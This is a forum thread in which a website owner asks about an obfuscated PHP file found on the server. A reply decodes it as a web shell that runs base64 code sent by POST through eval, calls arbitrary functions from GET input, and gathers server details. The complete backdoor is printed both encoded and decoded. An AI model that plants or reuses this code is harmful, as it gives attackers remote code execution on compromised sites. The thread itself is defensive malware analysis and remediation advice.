Member Avatar for slyme

I found a file called 4be7.php in the root of my web site.

I guess my first worry is how did it get there? Well, I've changed my FTP log on, what else can I do?

Secondly, what is it? Here's what's in it:

<?php //176e622a9e272282a4a56a9100f5b75d 
 $_= 
//ppZiAAS8dDJF9Q*(#_+@#TWyJ
'Ci8qKgogKiBAdmVyc2lvbiAyLjYKICoKICovCmlmIChpc3NldCgkX1BPU1RbImFjdGlvbiJdKSkKewogICAgICAgIHN3aXRjaCAoJF9QT1NUWyJhY3Rpb24iXSkKICAgICAgICB7CiAgICAgICAgICAgICAgICBjYXNlICJ0ZXN0IjoKICAgICAgICAgICAgICAgICAgICAgICAgdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgInJlZ3VsYXJfdGVzdCI6CiAgICAgICAgICAgICAgICAgICAgICAgIHJlZ3VsYXJfdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgIm1haWwiOgogICAgICAgICAgICAgICAgICAgICAgICBzZW5kKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgZGVmYXVsdDoKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgICAgIHJldHVybjsKfQoKaWYgKGNvdW50KCRfR0VUKSA+IDApCnsKICAgICAgICBmb3JlYWNoICgkX0dFVCBhcyAkaWQgPT4gJGNvZGUpCiAgICAgICAgewogICAgICAgICAgICAgICAgaWYgKCRpZCA9PSAiaWQiKQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAkY29kZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm47Cn0KCmZ1bmN0aW9uIHRlc3QoKQp7CiAgICAgICAgJGVuY29kZWRfZGF0YSA9ICIiOwoKICAgICAgICAkZGF0YVsidmVyc2lvbiJdID0gcGhwdmVyc2lvbigpOwogICAgICAgIGlmIChpc3NldCgkX1NFUlZFUlsiU0VSVkVSX1NPRlRXQVJFIl0pKQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICRfU0VSVkVSWyJTRVJWRVJfU09GVFdBUkUiXTsKICAgICAgICB9CiAgICAgICAgZWxzZQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICJOb3QgQXZhaWxhYmxlIjsKICAgICAgICB9CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBwaHBpbmZvKDgpOwogICAgICAgICRkYXRhWyJtb2R1bGVzIl0gPSBvYl9nZXRfY29udGVudHMoKTsKICAgICAgICBvYl9jbGVhbigpOwogICAgICAgICRkYXRhWyJleHRfY29ubmVjdCJdID0gZm9wZW4oImh0dHA6Ly93d3cueWEucnUvIiwgInIiKSA/IFRSVUUgOiBGQUxTRTsKICAgICAgICAkc2VyaWFsaXplc19kYXRhID0gc2VyaWFsaXplKCRkYXRhKTsKICAgICAgICAkZW5jb2RlZF9kYXRhID0gYmFzZTY0X2VuY29kZSgkc2VyaWFsaXplc19kYXRhKTsKICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl0gLiAkZW5jb2RlZF9kYXRhOwp9CgpmdW5jdGlvbiByZWd1bGFyX3Rlc3QoKQp7CgogICAgICAgICR0byA9ICJhaXJAZXhhbXBsZS5jb20iOwogICAgICAgICRzdWJqID0gIlNVQkohIjsKICAgICAgICAkbWVzc2FnZSA9ICJFSExPIjsKICAgICAgICAkcmVzID0gbWFpbCgkdG8sJHN1YmosJG1lc3NhZ2UpOwogICAgICAgIGlmKCRyZXMpCiAgICAgICAgewogICAgICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl07CiAgICAgICAgfQogICAgICAgIGVsc2UKICAgICAgICB7CiAgICAgICAgICAgIGVjaG8gc3RycmV2KCRfUE9TVFsidGVzdF9tZXNzYWdlIl0pOwogICAgICAgIH0KfQoKZnVuY3Rpb24gc2VuZCgpCnsKICAgICAgICAkY29kZSA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJwcm9qZWN0Y29kZSJdKTsKCiAgICAgICAgZXZhbCgkY29kZSk7CiAgICAgICAgLy9yZXR1cm47Cn0K'; 
 //ppZiAAS8dDJF9Q*(#_+@#TWyJ
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

I have searched on the internet but all pages I've found so far referring to any of this code result in the site trying to download some internet nasty or another on my PC so I'm guessing this is bad stuff!

Any advice welcome.

S.

  • 3 Contributors
  • 6 Replies
  • 259 Views
  • 1 Day Discussion Span
  • Latest Post Latest Post by slyme
Member Avatar for cereal

last string is hex code, while the rest is base64, this is the translation:

/**
 * @version 2.6
 *
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        $code();
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{

        $to = "air@example.com";
        $subj = "SUBJ!";
        $message = "EHLO";
        $res = mail($to,$subj,$message);
        if($res)
        {
            echo $_POST["test_message"];
        }
        else
        {
            echo strrev($_POST["test_message"]);
        }
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);

        eval($code);
        //return;
}

last string:

echo base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7');
# output:
# $code = base64_decode($_);
# eval($code);

You can start by removing it and sanitizing the data you get from any script in which you use POST or GET methods.

Edited by cereal because: n/a
commented: Useful post +7
Member Avatar for slyme

Thanks cereal - Wow ... who'd have thought that it meant all that?!

So, I'm guessing that if a browser looked at this file then it will email air@example.com or contact http://www.ya.ru/ with some data depending on the GET/POST fields?

I don't understand how this file got there.

I do 'sanitise' any GET/POST fields that I use as follows:

function sanitise($input){
	if (get_magic_quotes_gpc()) {
		$input = stripslashes($input);
	}
	return htmlentities($input, ENT_QUOTES);
}

Is this good enough?

thanks for your help,

Simon.

Member Avatar for karthik_ppts

mark this thread as solved if your problem solved

Member Avatar for slyme

mark this thread as solved if your problem solved

Hi Karthik_pranas,

Not sure if it is solved yet ... I'm still wondering if I'm doing enough to sanitise any inputs and, if I'm not, could this have been the route a malicious user might have used to upload this file?

I will keep my eye on this and I will mark as solved if/when it is. Thanks for the reminder.

Simon.

Member Avatar for cereal

Hi, that is not sufficient, there are many ways to attack a PHP application you may want to read more about this subject here:

- https://www.owasp.org/index.php/Projects/OWASP_Secure_Web_Application_Framework_Manifesto/Releases/Current/Manifesto
- http://phpsec.org/projects/ & check also /library/

You must check server logs and application logs, review firewall rules, check if there are new processes. You can also try to search more info about this script by searching ppZiAAS8dDJF9Q*(#_+@#TWyJ , it seems this string is in common with other versions of the same script. Bye.

Member Avatar for slyme

Hi, that is not sufficient, there are many ways to attack a PHP application you may want to read more about this subject here:

- https://www.owasp.org/index.php/Projects/OWASP_Secure_Web_Application_Framework_Manifesto/Releases/Current/Manifesto
- http://phpsec.org/projects/ & check also /library/

You must check server logs and application logs, review firewall rules, check if there are new processes. You can also try to search more info about this script by searching ppZiAAS8dDJF9Q*(#_+@#TWyJ , it seems this string is in common with other versions of the same script. Bye.

Thanks again cereal ... I shall mark this as resolved and start reading those pages ... there's an awful lot there!

thanks,

Simon.

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.